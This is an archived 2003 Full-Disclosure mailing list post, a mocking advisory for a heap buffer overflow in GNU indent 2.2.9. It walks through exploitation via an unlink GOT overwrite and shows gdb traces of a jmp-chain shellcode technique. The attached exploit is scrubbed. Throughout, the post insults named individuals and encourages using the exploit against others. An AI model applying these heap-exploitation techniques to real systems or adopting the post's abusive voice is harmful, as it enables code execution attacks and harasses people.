lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <200312261310.hBQDAWMJ081601@mailserver2.hushmail.com>
From: wtphs at hush.com (Winnie The Pooh Hacking Squadron)
Subject: Winnie The Pooh Hacking Squadron Presents: 0day 31337 vulnerability in indent 2.2.9

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


                              XXXX
                            XX    XX
         XXXX              XX        XX
       XXX   XX           XX          XX
     XX        XX  XXXX  XX           XX
    XX           XX    XXXX           XX
   XX             XX       XXX        XX
   XX             XX         XXX     XX
    XX                         XXX  XX
     XX                          XXX
      XX                           XX
       XX                           XX
        XXXX                          XX
      XX                                XX
      XX                                  XX
      XX                              X    XX
     XX                             XXX    XX
     XX                            XX      XX
    XXX                               XX   XX
    XXX                             XXXX   XX
    XXX                             XXX    XX
    XXX                                     XXXX
    XXX                                        XXXXX
     XX                                        XXXXX
      XX                                        XXXX
XX    XX                                        XXX
 XXXXXXXX                         X            XX
 XX.....XXXXX                    XX           XX
   XX.......XXXXXXX            XX XX         XX
    XX............XXXXXXX       XX  XX     XXX
     XX..X..............XXXXXX    XXXXXXXXXX
      XXX....................XXXX     XX
      XX........................XXXX XXXXX
     XX.............................XXXX..XX
    XX.................................XX..XX
   XX......................................XX
  XXX.......................................XX
 XXXX.........................................XX
 XXX...................X........................XX
 XXXXXXX...............X...........................XX
  XX    XXXX...........XX..........................XX
  XX        XXX.......XX............................XX
  XX           XXX...XX..............................XX
  XX              XXXX....XXXXXXXXXXXXXXXXXX..........XX
  XX               XXXXXXXX                XXXXXXXXXXXXXX
  XX              XX                                  XX
  XX             XX                                    XX
 XX              XX                                      XX
 XX             XX                                        XX
 XX             XX                                         XX
 XX             XX                                          XX
 XX             XX                                            XX
 XX             XX                                             XX
 XX             XX                                              X XXX
  XX            XX                                              XX
XX
  XX            XX                                               XX
   XX
  XX           XX                                                 XX
      XX
  XX           XX                                                 XX
       XX
  XX          XX                                                   XX
      XX
  XX         XX                                                    XX
      XX
   XX       XX   X                                                XX
      XX
    XX    XXX   XX               X                                XXXX
   XX
      XXXX  XX  XX                XX                              XX
XXXXXX
              XX XX                  XXX                          XX
              XXXX                     XXX                       XX
                XX                       XXX                    XX
                XX                          XX                 XX
                XX                          XX               XX
                 XX                           XX            XX
                XXXX                           XX         XX
             XXX   XX                           XX     XXX
           XX       XX                          XX  XXX
         XX           XX                       XXXXXXX
        XX              XX                  XXX       XXX
       XX                 XX              XXX    XXX     XX
       XX                   XXX          XX   XXX        XX
        XX                     XX       XX   XX          XX
        XX                  XXX XX     XX   XX            XX
         XX            XXXXX      XX  XX   XX             XX
         XX          XX  XX        XXXX    XX            XX
          XX        X     XX        XXX   XX             XX
           XX              XX        XX   XX             XX
            XX              XX       XX    XX           XX
             XX              XX       XX   XX           XX
               XX            XX       XX    XX         XX
                 XX          XX        XX   XX        XX
                  XXX     XXX          XX          XXX
                      XXXXX              XXX     XXX
                                           XXXXX








          .  .             .___..       .__       .
          |  |*._ ._ * _     |  |_  _   [__) _  _ |_
          |/\||[ )[ )|(/,    |  [ )(/,  |   (_)(_)[ )
      .  .      .            __.           .
      |__| _. _.;_/*._  _   (__  _.. . _. _|._. _ ._
      |  |(_](_.| \|[ )(_]  .__)(_](_|(_](_][  (_)[ )
                       ._|        |
                          .__                 ,
                          [__)._. _  __ _ ._ -+- __ *
                          |   [  (/,_) (/,[ ) | _)  *







          Software: indent
           Version: 2.2.9
     Vulnerability: buffer overflow while parsing .c file
        Found date: Aug 2002
      Release date: today you stupid whitehat boy
       Researchers: Winnie The Pooh Hacking Squadron
    Favourite food: whitehat soup

[0] LICENSE

    1) No whitehat whore can use this in his pseudo-security work
    2) divineint can't trade exploit attached to this advisory on
       #darknet@...et nor other lame channel (for people who don't
       know it yet - his new nick is illumanti(z), is he hidding ?!)

    3) Every hacker can implement exploit for this vuln in his
       codes to protect them from script kiddies and whitehats.
    4) WtPHS strongly encourage hackers to use this against
       whitehats.
    5) WtPHS don't give a shit if you hurt yourself

[1] INTRO

    indent is really fucking leet tool that improves appearance
    of C source code. It was designed to help people reading
    sources written by damn stupid and unskilled programmers like
    You Dong-Hun or Theo the Radt. It is really helpful nowadays
    because of that whores who think they are coders. Unfortunatelly

    authors of indent also made their software vulnerable to buffer
    overflow.

[2] DETAILS

    handle_token_colon(...) is vulnerable function. Buffer overflow
    occurs while parsing text (from .c file of korz), which indent
    treat like label. It copies whole 'label' to, 1000 bytes long,
    buffer on heap, without bounds checking. (Note for divineint-alike
    people: such overflow can lead to overwrite of heap stuctures and
    as result of this - arbitrary code execution).

    This is vulnerable part of handle_token_colon(...) function:

        for (t_ptr = s_code; *t_ptr; ++t_ptr)
        {
            *e_lab++ = *t_ptr; /* turn everything so far into a label
*/
        }

   (Note for gorion(*)-alike people: this loop will copy as long as NULL
    byte will be find in source string)

[3] EXPLOITATION

    This section is needed for stupid people like divineint or Lorenzo

    Hernandez Garcia-Hierro (Good Lord! I feel like in south-american

    telenovel saing his name).

    Smart people choose clear_buf_break_list() function to cause code
    execution. This function is executed just after our vulnerable loop,

    so we don't risk application crash. indent breaks source code and

    makes double-linked list (buf_break_list) of code parts. Mentioned
    function free()'s all buf_break_list entries.

    This double-linked list entries are allocated after 'labbuf' (e_lab

    points to labbuf) so we are able to overwrite it.

    Now exploitation is very easy. Overwrite free() GOT entry with and
    make clear_buf_break_list() loop run once again by setting 'prev'
    field of buf_break_st_ty struct to some readable value.

    Exploit for this vulnerability for indent 2.2.9 from slackware 9.0
    is attached to this advisory.

    NOTICE!!!! QUIZ FOR KIDDIES:
    -----------------------------------------------------------------
- ----
   This exploit have simple execve(shell) shellcode. What do you have
to
   change to make this exploit useful ?
    -----------------------------------------------------------------
- ----
   FIRST PERSON WHO SENDS US GOOD ANSWER WINS OpenSSH Buffer Management
   Vulnerability REMOTE EXPLOIT ... DON'T WAIT !! DO IT NOW!

[4] EDUCATIONAL VALUE

   Whats educational here? One technique used in this exploit. Lets call
   FD = WHAT and BK = WHERE-8. People with IQ > 75 knows that unlink()

   will do *(WHAT+0xc)=(WHERE-8) except *((WHERE-8)+8) = WHAT.

    If we point WHAT to NOPs before our shellcode, unlink() will change
    few of our NOPs to something else. Executing this 'somethingelse'
    will probably crash our application. It looks like this:

    Before unlink():

       (gdb) x/20i 0x805b440
        0x805b440:      nop
        0x805b441:      nop
        0x805b442:      nop
        0x805b443:      nop
        0x805b444:      nop
        0x805b445:      nop
        0x805b446:      nop
        0x805b447:      nop
        0x805b448:      nop
        0x805b449:      nop
        0x805b44a:      nop
        0x805b44b:      nop
        0x805b44c:      nop
        0x805b44d:      nop
        0x805b44e:      nop
        0x805b44f:      nop
        0x805b450:      nop
        0x805b451:      nop
        0x805b452:      nop
        0x805b453:      nop
        (gdb) x/x 0x8058dc8
        0x8058dc8 <_GLOBAL_OFFSET_TABLE_+144>:  0x40019f52

    After unlink():

        (gdb) x/x 0x8058dc8
        0x8058dc8 <_GLOBAL_OFFSET_TABLE_+144>:  0x0805b440
        (gdb) x/20i 0x805b440
        0x805b440:      nop
        0x805b441:      nop
        0x805b442:      nop
        0x805b443:      nop
        0x805b444:      nop
        0x805b445:      nop
        0x805b446:      nop
        0x805b447:      nop
        0x805b448:      nop
        0x805b449:      nop
        0x805b44a:      nop
        0x805b44b:      nop
        0x805b44c:      rorb   $0x90,0x90900805(%ebp)
        0x805b453:      nop
        0x805b454:      nop
        0x805b455:      nop
        0x805b456:      nop
        0x805b457:      nop
        0x805b458:      nop
        0x805b459:      nop

    Next call to free() will jump to 0x805b440. If execution flow will

    reach 0x805b44c, program will crash at this instruction.

    Solution is simple, however WtPHS don't remember anybody describing

    it before, so ... here it is: Instead of NOPs you can use relative

    jmp's like this:

    Before unlink():

        (gdb) x/20i 0x805b440
	0x805b440:      jmp    0x805b44a
	0x805b442:      jmp    0x805b44c
	0x805b444:      jmp    0x805b44e
	0x805b446:      jmp    0x805b450
	0x805b448:      jmp    0x805b452
	0x805b44a:      jmp    0x805b454
	0x805b44c:      jmp    0x805b456
	0x805b44e:      jmp    0x805b458
	0x805b450:      jmp    0x805b45a
	0x805b452:      jmp    0x805b45c
	0x805b454:      jmp    0x805b45e
	0x805b456:      jmp    0x805b460
	0x805b458:      jmp    0x805b462
	0x805b45a:      jmp    0x805b464
	0x805b45c:      jmp    0x805b466
	0x805b45e:      jmp    0x805b468
	0x805b460:      jmp    0x805b46a
	0x805b462:      jmp    0x805b46c
	0x805b464:      jmp    0x805b46e
	0x805b466:      jmp    0x805b470

    After unlink():

        (gdb) x/10i 0x805b440
	0x805b440:      jmp    0x805b44a
	0x805b442:      jmp    0x805b44c
	0x805b444:      jmp    0x805b44e
	0x805b446:      jmp    0x805b450
	0x805b448:      jmp    0x805b452
	0x805b44a:      jmp    0x805b454
	0x805b44c:      rorb   $0xeb,0x8eb0805(%ebp)
	0x805b453:      or     %ch,%bl
	0x805b455:      or     %ch,%bl
	0x805b457:      or     %ch,%bl

	(gdb) x/10i 0x805b454
	0x805b454:      jmp    0x805b45e
	0x805b456:      jmp    0x805b460
	0x805b458:      jmp    0x805b462
	0x805b45a:      jmp    0x805b464
	0x805b45c:      jmp    0x805b466
	0x805b45e:      jmp    0x805b468
	0x805b460:      jmp    0x805b46a
	0x805b462:      jmp    0x805b46c
	0x805b464:      jmp    0x805b46e
	0x805b466:      jmp    0x805b470

	This way we jumped over shitty instruction. These jmps
	will lead execution flow to our shellcode, but to be sure
	that no jmp will jump into middle of shellcode you have
	to put few (at least 8) NOPs before shellcode. Than last
	jmp will jump to NOPs and than shellcode will be executed
	properly.

[5] IMPACT

    Possible impact is quite big. For example companies and software
    developers that are terrified because of their software is damn
    shitty (Cisco, Apache, OpenBSD, Linux Kernel first come to our
    mind) could implement exploit for this vuln into their source
    codes to make hackers life difficult.

[6] FLAMES, SHOUTOUTS and FINAL NOTES

    *) no, divineint, you can't get our juarez - stop begging for it
       biatch
    *) no, Stefan Esser, you can't steal our juarez and public it
       as your own, because you are to stupid to own us.
    *) shoutouts to our brotherly squad - Mickey Mouse Hacking Squadron
    *) shoutouts to PHC for terrorizing whitehats and full-disclosure
    *) recent OpenSSH vulnerability is exploitable
    *) greetings to Lorenzo Hernandes Garcia-Hierro for making us
       laught on the floor while reading his posts.
    *) kudos to Alan Alexander Milne (R.I.P - 1956)

[7] OUTRO

    the end...
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Charset: UTF8
Version: Hush 2.3

wkYEARECAAYFAj/sM6EACgkQYE4zNxPdkhNhpACfc5C40UAJ7K8ybtvg6o6uXUzhoR0A
oI+4wR01MMKbGwVqDdpjIxXRrzX7
=eC7E
-----END PGP SIGNATURE-----

-------------- next part --------------
A non-text attachment was scrubbed...
Name: WinnieThePooh-indent-2.2.9-0day.tar.bz2
Type: application/x-bzip2
Size: 1511 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031226/f31ac576/WinnieThePooh-indent-2.2.9-0day.tar.bin
-------------- next part --------------
An embedded and charset-unspecified text was scrubbed...
Name: WinnieThePooh-indent-2.2.9-0day.tar.bz2.sig
Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20031226/f31ac576/WinnieThePooh-indent-2.2.9-0day.tar.bz2.ksh

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ